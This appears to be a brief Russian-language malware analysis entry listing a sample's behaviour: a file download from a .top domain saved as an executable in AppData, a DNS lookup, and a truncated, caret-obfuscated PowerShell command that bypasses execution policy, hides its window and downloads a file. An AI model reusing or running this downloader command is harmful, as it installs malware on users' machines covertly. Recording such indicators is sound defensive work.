Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^w^eR^sHE^LL.e^Xe^ ^-^EXe^C^UT^i^o^NPoLIcy^ b^Y^pA^ss ^-n^OPro^FIL^e ^-^wIndO^WsTylE ^hI^DDE^n (^NEw-obj^EcT sYS^T^E^M.n^eT^.WEb^cL^ienT).d^o^w^n^loadfi^LE('http://dosehoop.to...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /C "P^O^w^eR^sHE^LL.e^Xe^ ^-^EXe^C^UT^i^o^NPoLIcy^ b^Y^pA^ss ^-n^OPro^FIL^e ^-^wIndO^WsTylE ^hI^DDE^n (^NEw-obj^EcT sYS^T^E^M.n^eT^.WEb^cL^ienT).d^o^w^n^loadfi^LE('http://dosehoop.to...' (со скрытым окном)